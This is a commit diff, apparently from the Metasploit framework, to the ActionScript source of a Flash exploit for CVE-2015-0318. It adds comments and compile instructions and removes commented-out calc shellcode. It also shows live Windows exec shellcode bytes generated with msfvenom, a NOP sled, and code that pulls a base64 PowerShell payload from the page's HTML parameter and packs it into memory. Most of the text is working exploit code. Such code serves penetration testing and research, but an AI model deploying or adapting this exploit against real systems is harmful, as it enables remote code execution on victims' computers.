Update Main.as

wchen-r7 · wchen-r7 · commit 2a25e2b2e1f5 · 2015-03-13T11:40:16.000-05:00
diff --git a/external/source/exploits/CVE-2015-0318/Main.as b/external/source/exploits/CVE-2015-0318/Main.as
@@ -1,5 +1,10 @@
 package 
 {
+	/*
+	To compile (AIRSDK + Flex):
+	mxmlc Main.as -o Main.swf -strict=false
+	*/
+
 	import mx.utils.Base64Decoder;
 	import flash.display.*;
 	import flash.utils.ByteArray;
@@ -421,42 +426,19 @@ package
 			v[i++] = 0x90909090;
 			v[i++] = 0x90909090;
 			v[i++] = 0x90909090;
-			//v[i++] = 0xcccccccc;
+			//v[i++] = 0xcccccccc; // Sort of handy for debugging purposes
 
+			// Our payload (see GetPayload)
 			for (var payload_i:int; payload_i < myshellcode.length; payload_i++) {
 				v[i++] = myshellcode[payload_i];
 			}
 
 			v[i++] = 0x90909090;
 			v[i++] = 0x90909090;
 			v[i++] = 0x90909090;
-			//v[i++] = 0xcccccccc;
-			
-			// we're using skylined's win32 calc shellcode, the function 
-			// version that saves registers, but without the ret at the end...
-			
-/*						
-			v[i++] = 0x52d23160;
-			v[i++] = 0x6c616368;
-			v[i++] = 0x52e68963;
-			v[i++] = 0x728b6456;
-			v[i++] = 0x0c768b30;
-			v[i++] = 0xad0c768b;
-			v[i++] = 0x7e8b308b;
-			v[i++] = 0x3c5f8b18;
-			v[i++] = 0x781f5c8b;
-			v[i++] = 0x201f748b;
-			v[i++] = 0x4c8bfe01;
-			v[i++] = 0xf901241f;
-			v[i++] = 0x512cb70f;
-			v[i++] = 0x3c81ad42;
-			v[i++] = 0x6e695707;
-			v[i++] = 0x8bf17545;
-			v[i++] = 0x011c1f74;
-			v[i++] = 0xae3c03fe;
-			v[i++] = 0x5858d7ff;
-			v[i++] = 0x90909061;
-	*/
+			//v[i++] = 0xcccccccc; // Sort of handy for debugging purposes
+			
+
 			// we just put things back how they were; at least, everything 
 			// important. we need esp and ebp to be correct, which is easy;
 			// we need ecx to point to the object's vtable and then we can
@@ -475,18 +457,36 @@ package
 		}
 
 		public function GetPayload():Array {
+			// Grab the powershell payload from the sh parameter in the HTML file
 			var b64:Base64Decoder = new Base64Decoder();
 			var raw_psh_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh;
 			b64.decode(raw_psh_payload);
 			var psh_payload:String = b64.toByteArray().toString();
-			var payload:String = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + psh_payload + "\x00";
 
+			// This is generated from here:
+			// ./msfvenom -p windows/exec CMD=AAAA -f ruby -e generic/none
+			// The original souce can be found at: msf/externa/source/shellcode/single_exec.asm
+			var payload:String = "" +
+			"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14" +
+			"\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
+			"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59" +
+			"\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
+			"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
+			"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
+			"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68" +
+			"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" +
+			"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + psh_payload + "\x00";
+
+			// Here we convert the binary string to an array of DWORDS
 			var arr:Array = new Array();
 			for (var d_counter:int = 0; d_counter < payload.length; d_counter+=4) {
 				var dword:String = payload.substring(d_counter, d_counter+4).split("").reverse().join("");
-				var hex:String = "";
+				var hex:String = ""; 
 				for (var i2:int = 0; i2 < dword.length; i2++) {
 					var byte:String = dword.charCodeAt(i2).toString(16);
+					// The toString(16) conversion doesn't print zeros the way we want it.
+					// Like for example: for a null byte, it returns: '0', but the format should be: '00'
+					// Another example: For 0x0c, it returns 'c', but it should be '0c'
 					if (byte == '0') {
 						byte = "00";
 					} else if (byte.length == 1) {
